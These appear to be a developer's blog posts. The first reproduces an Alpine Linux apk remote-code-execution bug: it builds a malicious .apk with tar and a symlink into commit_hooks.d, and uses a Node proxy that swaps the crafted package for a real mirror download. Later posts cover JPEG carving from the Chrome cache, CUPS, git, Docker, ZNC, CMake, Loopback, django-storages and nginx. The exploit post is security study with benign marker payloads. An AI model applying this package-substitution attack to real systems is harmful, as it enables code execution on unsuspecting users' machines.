Matheus Bratfisch: Cogito ergo sum

Testing RCE on Alpine Linux via APK

I have been studying a little bit of security, and one of the things I do from time to time is read CVEs and try to reproduce and understand what is happening. Yesterday Max Justicz published Remote Code Execution in Alpine Linux. He found an issue in apk, the package manager for Alpine Linux, which is super popular in Docker images.

Max did a great job explaining the steps and the reasoning, but I wanted to try it myself.

- Create a folder at /etc/apk/commit_hooks.d/, which doesn’t exist by default. Extracted folders are not suffixed with .apk-new.
- Create a symlink to /etc/apk/commit_hooks.d/x named anything – say, link. This gets expanded to be called link.apk-new but still points to /etc/apk/commit_hooks.d/x.
- Create a regular file named link (which will also be expanded to link.apk-new). This will write through the symlink and create a file at /etc/apk/commit_hooks.d/x.
- When apk realizes that the package’s hash doesn’t match the signed index, it will first unlink link.apk-new – but /etc/apk/commit_hooks.d/x will persist! It will then fail to unlink /etc/apk/commit_hooks.d/ with ENOTEMPTY because the directory now contains our payload.

The instructions seem simple, but if you are not super familiar with how a tar file works, you may not understand them. A tar file can contain multiple entries with the same name, and you can extract a specific one using the --occurrence option. With this in mind, the instructions make a little bit more sense, so shall we try to create this file?
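
This is easy to see with GNU tar; demo.tar and file below are just placeholder names:

echo one > file
tar -cf demo.tar file
echo two > file
tar -rf demo.tar file                  # append a second entry with the same name
tar -tvf demo.tar                      # "file" is listed twice
tar -xf demo.tar --occurrence=1 file   # extracts the first occurrence ("one")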

First of all, let’s create the directories:

sudo mkdir /etc/apk/commit_hooks.d/
mkdir folder_for_link
mkdir folder_for_real_file

Create the link:

ln -s /etc/apk/commit_hooks.d/x folder_for_link/magic

Create the real file at folder_for_real_file/magic with this content:

#!/bin/sh

echo "something" > /tmp/test-12346-YAY
echo "ha" > /testfileroot

(If it really works we should have a /tmp/test-12346-YAY file and a /testfileroot too)

Cool, now it seems we have almost everything we need! Let’s create the apk with:

tar -zcvf bad-intention.apk /etc/apk/commit_hooks.d/ -C $PWD/folder_for_link/ magic -C $PWD/folder_for_real_file/ magic

Here we are adding these 3 things in sequence to the tar file; you can check the tar content with the t option:

$ tar tvf bad-intention.apk
drwxr-xr-x root/root         0 2018-09-13 19:44 etc/apk/commit_hooks.d/
lrwxrwxrwx root/root         0 2018-09-13 19:37 magic -> /etc/apk/commit_hooks.d/x
-rwxrwxrwx root/root       954 2018-09-13 23:24 magic

(Pay attention to the order of these entries: creation of the commit_hooks.d directory, creation of the link, and creation of the file.)

What should the behavior be now? Since apk on Alpine runs from /, it will create the folder /etc/apk/commit_hooks.d/, later it will extract the link, and to finish it will write the content of magic through the link, placing it in the x file. Note: I lost A LOT of time trying to see this behavior in tar itself, but tar doesn't behave this way; apk implements its own extractor.

OK, now we need to deliver this file when apk add runs inside Docker. Here, I have updated /etc/hosts and pointed dl-cdn.alpinelinux.org to localhost. Using Node (I experimented with the http-mitm-proxy and http-proxy libraries, but ended up needing only the built-in http plus request), I created a script that serves the bad .apk whenever the URL contains ltrace; otherwise it downloads the real file and sends it back to Docker.
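
The /etc/hosts entry looks like this:

127.0.0.1 dl-cdn.alpinelinux.org

And here is the proxy script: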

var http = require('http'),
    request = require('request'),
    fileSystem = require('fs'),
    path = require('path');

var server = http.createServer(function(req, res) {
  console.log('http://nl.alpinelinux.org' + req.url);
  if (req.url.indexOf('ltrace') > -1) {
    // serve our malicious package instead of the real one
    console.log("Trapped");
    var filePath = path.join(__dirname, 'bad-intention.apk');
    fileSystem.createReadStream(filePath).pipe(res);
  } else {
    // proxy everything else to a real Alpine mirror
    request('http://nl.alpinelinux.org' + req.url).pipe(res);
  }
});

console.log("listening on port 80");
server.listen(80);

Build the Docker image with docker build -t alpinetest --network=host --no-cache . using this Dockerfile:

FROM alpine:3.8

# RUN apk add python
RUN apk add ltrace

CMD "/bin/sh"

(If you are curious, you can take a look inside the Docker container even if the build failed and verify the files really are in the correct places. Use docker commit CONTAINER_ID and docker run -it SHA256_STRING sh.)

This returned “The command ‘/bin/sh -c apk add ltrace’ returned a non-zero code: 1”. This happened because apk verifies the signature of the apk and tries to clean up the files, but it is not able to, since /etc/apk/commit_hooks.d/ contains a file. How to do some magic to make apk return exit code 0? Max has found one (or two) ways of doing this.

I still need to study what exactly his Python script does to fix the exit code, but I have tested it and it really works. As a quick test you can add RUN apk add python to the Dockerfile and update folder_for_real_file/magic to call his Python code.

I know this may sound simple, but it took me a while to figure out all the tiny details. If you find any mistake I made, or want to say something, drop me a line!

Matheus


Find images in Chrome cache files (or any other file!)

Good night,

Recently I deleted a few images from my server whose old links had been broken for the last few days, and I decided to try to find them in the Google Chrome cache. The chrome://cache URL was recently removed, but you can find your Chrome cache files at /home/matheus/.cache/google-chrome/Default/Cache/.

If you open one of these as binary, you will see it is not the original file directly. There is more information embedded in it, such as the URL, headers, HTTP status code and others. We could take a look at the Chrome source code (the cache storage format) to extract everything from the file, not only images, but to be honest I was too lazy to dig into that because I had a very specific need in this case.

Why not scan the cache files for the JPEG binary directly? We just need to know how to find the start and end of an image:

  • bytes 0xFF, 0xD8 indicate start of image
  • bytes 0xFF, 0xD9 indicate end of image
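
As a quick sanity check on a real JPEG (photo.jpg here is any image you have around; this assumes xxd is installed):

xxd -l 2 photo.jpg        # first two bytes: ff d8
tail -c 2 photo.jpg | xxd # last two bytes of a clean file: ff d9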

OK. So how would we do this in Python?

Open the file as binary and check whether there is a JFIF or Exif marker in it (just to skip files we can't process):

# Python 2: data is a str here, so we can search for the markers as substrings
f = open(filepath, 'rb')

data = f.read()
if 'JFIF' not in data and 'Exif' not in data:
	return

Now let's iterate over all the bytes looking for those specific sequences. To do this we keep prev, which holds the value of the previous byte; pos, to know which position we are at; and one array each for SOI (Start Of Image) and EOI (End Of Image), which hold the positions of these markers. If the previous byte is FF and the current one is D8, we append the position to soi; if it is D9, we append it to eoi.

prev = None
soi = []
eoi = []
pos = 0
for b in data:
	if prev is None:
		prev = b
		pos = pos + 1
		continue
	if prev == chr(0xFF):
		if b == chr(0xD8):
			soi.append(pos-1)
		elif b == chr(0xD9):
			eoi.append(pos-1)
	prev = b
	pos = pos + 1

Now we can take the SOI and EOI positions and save the data between them. The only magic here is taking the first SOI and the last SOI or EOI, depending on which one is bigger.

path, filename = os.path.split(filepath)
file = open('{}/{}-{}.jpg'.format(OUTPUT_FOLDER, filename, 0), 'wb')
m1 = soi[0]
m2 = soi[-1] if soi[-1] > eoi[-1] else eoi[-1]
file.write(data[m1:m2 + 2])  # +2 so the closing marker bytes are included

file.close()

print(filename, "SOI", soi, len(soi))
print(filename, "EOI", eoi, len(eoi))

This code will save only one image. If you want you could iterate over the SOI and EOI and save multiple files.

Would this be some kind of file carving?

I hope this helps you! Matheus

Grab the full script below, create the OUTPUT_FOLDER and run it as python yourfile.py filetocheck. This version should be able to handle multiple images inside the same file, so you can point it at a whole cache entry, for instance.

import os
import glob
import sys

OUTPUT_FOLDER = "output-this2"


def save_file(data, path, filename, count, eoi, soi):
	file = open('{}/{}-{}.jpg'.format(OUTPUT_FOLDER, filename, count), 'wb')
	m1 = soi[0]
	m2 = soi[-1] if soi[-1] > eoi[-1] else eoi[-1]
	file.write(data[m1:m2 + 2])  # +2 so the closing marker bytes are included
	file.close()

def extract(filepath):
	count = 0
	f = open(filepath, 'rb')

	data = f.read()
	if 'JFIF' not in data and 'Exif' not in data:
		return

	path, filename = os.path.split(filepath)

	old_soi = []
	old_eoi = []
	prev = None
	soi = []
	eoi = []
	eoi_found = False
	pos = 0
	for b in data:
		if prev is None:
			prev = b
			pos = pos + 1
			continue
		if prev == chr(0xFF):
			if b == chr(0xD8):
				if eoi_found:
					save_file(data, path, filename, count, eoi, soi)
					old_soi = old_soi + soi
					old_eoi = old_eoi + eoi
					soi = []
					eoi = []
					count = count + 1
					eoi_found = False
				soi.append(pos-1)
			elif b == chr(0xD9):
				eoi.append(pos-1)
				eoi_found = True
		prev = b
		pos = pos + 1

	save_file(data, path, filename, count, eoi, soi)
	print(filename, "SOI", old_soi + soi, len(old_soi + soi))
	print(filename, "EOI", old_eoi + eoi, len(old_eoi + eoi))

def main():
	if len(sys.argv) < 2:
		sys.exit(1)

	extract(sys.argv[1])

if __name__=="__main__":
	main()

Reference: https://stackoverflow.com/questions/4585527/detect-eof-for-jpg-images


Printer connected to a Raspberry Pi, accessible from the network

Hey guys,

For a long time my father has been complaining that using the printer wasn't practical enough, so to solve this I decided to add a Raspberry Pi Zero W connected to my printer (HP Deskjet F2050) and share the printer using CUPS.

First, connect to your RPi and install CUPS:

sudo apt-get install cups

If you want to have a web interface to configure it from your local network, update /etc/cups/cupsd.conf:

sudo vim /etc/cups/cupsd.conf

Find the line:

Listen localhost:631

And update it to:

# Listen localhost:631
Port 631

You will have multiple <Location> sections; if you want access to be allowed only from your computer, add Allow from YOUR_IP to every section. Example:

<Location />
  Order allow,deny
  Allow from 10.0.0.2
</Location>

(If you want to allow access from anywhere, use Allow from all)

Add your user (in my case pi) to the lpadmin group:

sudo usermod -a -G lpadmin pi

Access your Raspberry Pi IP in your browser on port 631 (https://RPI_IP:631/).

Go to the Administration - Add Printer menu. You should see your local printer there; select it and follow the wizard to set it up.
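
If you prefer the command line over the web wizard, something along these lines should also work (DEVICE_URI and MODEL are placeholders; take the real values from the lpinfo output):

lpinfo -v                                    # list detected device URIs
lpinfo -m                                    # list available driver models
lpadmin -p deskjet -E -v DEVICE_URI -m MODEL
lpadmin -p deskjet -o printer-is-shared=true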

If you're using an HP printer and can't find yours, try:

sudo apt-get install hplip

And reboot.

Let me know if you have any problems.

See you, Matheus


Update the default git commit author and reset the author of existing commits

If you would like to set your global git author, use:

git config --global user.name "Your name"
git config --global user.email "[email protected]"

After having it set globally, you can set your git author per project using:

git config user.name "Your name"
git config user.email "[email protected]"

And a bonus: if you need to reset the git commit author of the last commit:

git commit --amend --reset-author

If you want to do it for multiple commits:

git rebase -i <COMMIT_HASH>
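
Then, in the editor that opens, mark with edit each commit whose author you want to fix, and repeat the following pair of commands until the rebase finishes (a sketch of the flow):

git commit --amend --reset-author --no-edit
git rebase --continue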

See you, Matheus


Docker-compose with PHP-FPM, sendmail, nginx, mariadb serving jekyll and wordpress

As I explained recently, I had a blog running Wordpress and decided to move to Jekyll, but there was a catch: I didn't want to lose any link pointing to my old Wordpress blog. To achieve this, I set up nginx to first try to find a static file from Jekyll and, if it is not found, fall back to Wordpress.

I was running my server on an EC2 instance with RDS and it was becoming a little bit expensive, so I decided to move everything to one machine and dockerize my setup so I could easily switch servers.

To achieve this, I have created a docker-compose with:

  • PHP-FPM with sendmail, to process PHP and send mail
  • Nginx, to serve the Jekyll static files and fall back to my old Wordpress blog when they are not found
  • MariaDB, as the database for Wordpress

Here is the docker-compose.yml:

version: '3'
services:
  fpm:
    # image: php:7.0-fpm-alpine
    build: php7fpm
    restart: always
    volumes:
      - ./wordpress.matbra.com/:/var/www/wordpress.matbra.com
      - ./php7fpm/sendmail.mc:/usr/share/sendmail/cf/debian/sendmail.mc
      - ./php7fpm/gmail-auth.db:/etc/mail/authinfo/gmail-auth.db
    ports:
      - "9000:9000"
    links:
      - mariadb 
    hostname: boarders.com.br
  
  nginx:
    image: nginx:1.10.1-alpine
    restart: always
    volumes:
      - ./nginx/nginx.conf:/etc/nginx/nginx.conf
      - ./nginx/app.vhost:/etc/nginx/conf.d/default.conf
      - ./logs/nginx:/var/log/nginx
      - ./wordpress.matbra.com/:/var/www/wordpress.matbra.com
      - ./jekyll.matbra.com/:/var/www/jekyll.matbra.com
    ports:
      - "80:80"
      - "443:443"
    links:
      - fpm

  mariadb:
    image: mariadb
    restart: always
    environment:
      - MYSQL_ROOT_PASSWORD=yourpassword
      - MYSQL_DATABASE=
    volumes:
    -   ./data/db:/var/lib/mysql

PHP-FPM container:

I'm using a custom Dockerfile which starts from php:7.0-fpm and adds sendmail support and the mysql extension. There is a custom start script which runs sendmail + php-fpm. (I know I should create a separate container for sendmail.)

In this container I'm basically mapping some PHP files and config files:

  • ./wordpress.matbra.com to /var/www/wordpress.matbra.com which are my wordpress files
  • ./php7fpm/sendmail.mc to /usr/share/sendmail/cf/debian/sendmail.mc which is my configuration file for sendmail
  • ./php7fpm/gmail-auth.db to /etc/mail/authinfo/gmail-auth.db, which holds the credentials for my Gmail account (see Configuring gmail as relay for sendmail)

I'm also mapping port 9000 to 9000, so I can communicate with PHP-FPM on this port, creating a link to mariadb and setting my hostname.

NGINX container:

I'm using the regular nginx alpine image with some mappings:

  • ./nginx/nginx.conf to /etc/nginx/nginx.conf which is my nginx configuration
  • ./nginx/app.vhost to /etc/nginx/conf.d/default.conf which is my website configuration with Jekyll falling back to wordpress
  • ./logs/nginx to /var/log/nginx which will be my log directory
  • ./wordpress.matbra.com/ to /var/www/wordpress.matbra.com which is the place where nginx can find wordpress website
  • ./jekyll.matbra.com/ to /var/www/jekyll.matbra.com which is the place where nginx can find jekyll website

I'm also mapping ports 80 to 80 and 443 to 443, and creating a link to PHP-FPM so nginx can communicate with the fpm container.

MARIADB container:

No mystery here: the regular mariadb image, with a mapping for the data and some environment variables.

Because I'm not adding my website files to the image, I have created a script init.sh to remove the website directory and clone the website from git. There is also a script update-config.sh to update the wp-config.php file with the correct environment variables.
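
My actual scripts are in the repository linked below, but the idea of update-config.sh is roughly the following sketch (the WORDPRESS_DB_* variable names are placeholders for illustration):

#!/bin/sh
# replace the wp-config placeholders with values from the environment
sed -i "s/database_name_here/$WORDPRESS_DB_NAME/" wp-config.php
sed -i "s/username_here/$WORDPRESS_DB_USER/" wp-config.php
sed -i "s/password_here/$WORDPRESS_DB_PASSWORD/" wp-config.php
# the database host is the compose service name, not localhost
sed -i "s/localhost/mariadb/" wp-config.php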

With this I can easily spin up a new machine with my website structure.

https://github.com/x-warrior/blog-docker

I hope this will be helpful for you. Matheus


Install ZNC IRC Bouncer on AWS Linux

If you want to install the ZNC IRC bouncer you will need CMake, but the CMake shipped with AWS Linux is too old: [Update your cmake to 3.x](http://www.matbra.com/2017/12/07/install-cmake-on-aws-linux.html).

Now you will need git to clone the ZNC source code and openssl-devel to have SSL support:

# yum install git openssl-devel

Clone ZNC source code

$ git clone https://github.com/znc/znc.git

Enter the source code folder

$ cd znc

Initialize submodules

$ git submodule update --init --recursive

Install it with:

$ cmake . 
$ make
# make install (run this step as root)

Configure it with:

$ znc --makeconf

Best regards, Matheus


Install CMake 3 on AWS Linux

If you are trying to build something using CMake and are getting the error “CMake 3.1 or higher is required. You are running version 2.8.12.2”, you can manually install a newer CMake version. To do this, I first removed the previous CMake:

# yum remove cmake

Then I tested that it was really removed:

$ cmake 
-bash: /usr/bin/cmake: No such file or directory

Install G++

# yum install gcc-c++

Download the latest version from the CMake downloads page:

$ wget https://cmake.org/files/v3.10/cmake-3.10.0.tar.gz

Extract it:

$ tar -xvzf cmake-3.10.0.tar.gz

Enter the cmake folder

$ cd cmake-3.10.0

Install it with:

$ ./bootstrap
$ make
# make install (run this step as root)

Now you should have cmake under /usr/local/bin/cmake. A quick check:
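
$ /usr/local/bin/cmake --version
cmake version 3.10.0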

Best regards, Matheus


Loopback model migration using a PostgreSQL database

I have been playing with Loopback. Initially I was just declaring models and using the in-memory datasource, but now I have reached a point where I need a persistent database.

I couldn't find an easy way to keep my database synced with my models. I'm not sure if I'm just not that familiar with Loopback yet, or if their documentation is not clear enough.

To sync your models with your database, you can create a file under bin/ called autoupdate.js and add the following:

var path = require('path');

var app = require(path.resolve(__dirname, '../server/server'));
var ds = app.datasources.db;
ds.autoupdate(function(err) {
  if (err) throw err;
  ds.disconnect();
});

The code is pretty simple: it fetches the app from server.js, grabs the datasource and runs the autoupdate command. You could use automigrate instead, but that one recreates the tables and wipes their data every time, so pay attention to this.
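
Run it from the project root (this assumes your datasource is named db, as in the script above):

node bin/autoupdate.js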

I think this will work for most datasources, but if it doesn't work for yours, drop me a line. I can try to help :D

Matheus

PS: Loopback will not create migrations and handle them as properly as Django does; sometimes you can end up in weird states. It seems Loopback works better with NoSQL databases.


Django Storages with Boto3 and additional Metadata only for Media

I have a personal project in which I'm using Python with Django and django-storages to upload my static and media files to Amazon S3. Because my media files are named with UUIDs and are not editable in my system, I wanted a long expiration time on them so I could save some bandwidth, but I didn't want this on the static files, which are updated more regularly when I'm updating the system.

Most resources refer to AWS_HEADERS, but it didn't work for me; it seems it applies only to boto (not boto3). After looking into the boto3 backend source code I discovered AWS_S3_OBJECT_PARAMETERS, which works for boto3, but this is a system-wide setting, so I had to extend S3Boto3Storage.

So the code that solved my problem was:

class MediaRootS3Boto3Storage(S3Boto3Storage):
    location = 'media'
    object_parameters = {
        'CacheControl': 'max-age=604800'
    }

If you're using boto (not boto3) and you want specific parameters only for media files, you could use:

class MediaRootS3BotoStorage(S3BotoStorage):
    location = 'media'
    headers = {
        'CacheControl': 'max-age=604800'
    }

You also need to update your django-storages settings. Pay attention to the class name: with boto3 it is S3Boto3Storage, with boto it doesn't have the 3 after Boto.

DEFAULT_FILE_STORAGE = 'package.module.MediaRootS3Boto3Storage'
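
To confirm the header is applied, you can upload a media file and inspect it; the bucket and key here are placeholders:

curl -sI https://your-bucket.s3.amazonaws.com/media/some-file.jpg | grep -i cache-control
# Cache-Control: max-age=604800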

A very simple tip, but it took me a while to figure out how it works.

Matheus


Nginx redirect on failure

As a few of you probably noticed, I recently decided to update my really old Wordpress blog from PHP 4~5 to a more recent stack, leaving a shared host and going to Heroku, which later became Amazon EC2.

I had to decide whether to keep Wordpress or change to a different technology such as Jekyll. I thought a lot about this and in the end I decided to use Jekyll. Why? Because using something new would motivate me to study, play with something new and work more.

Having decided to work with Jekyll, I had to think about my domain. I didn't want to break my old Wordpress blog; I want to keep it alive as a record and for SEO points. But how to keep both living together in an awesome way?

I thought the ideal would be something that tries to access the new website and, if the page is not found, redirects to the old Wordpress website. But how to redirect to the old blog only when a page is not found, while complying with the HTTP status codes (i.e. redirecting with a 301)?

After reading some nginx documentation, I found you can try one server and, if it fails, redirect to another one. It seems the ideal solution for now.

I have an nginx configuration file with multiple servers. First there is the Wordpress server, which basically just adds PHP-FPM to process PHP files on my own custom domain:

server {
    listen 80;
    server_name wordpress.matbra.com;

    location / {
        root   /var/www/wordpress/live;
        index  index.php index.html index.htm;
        try_files $uri $uri/ /index.php?$uri$args;
    }

    location ~ \.php$ {
        root /var/www/wordpress/live;
        fastcgi_pass   unix:/var/run/php-fpm/php-fpm.sock;
        fastcgi_index  index.php;
        fastcgi_param  SCRIPT_FILENAME  $document_root$fastcgi_script_name;
        include        fastcgi_params;
    }
}
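
To complete the idea described above, a second server block for the Jekyll site can try the static files first and send a 301 to the Wordpress domain when nothing matches. A sketch; the domain and paths here are assumptions:

server {
    listen 80;
    server_name www.matbra.com;

    root /var/www/jekyll/live;

    location / {
        # serve the Jekyll file if it exists, otherwise fall back
        try_files $uri $uri/index.html @wordpress;
    }

    location @wordpress {
        # comply with HTTP semantics: permanent redirect to the old blog
        return 301 http://wordpress.matbra.com$request_uri;
    }
}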
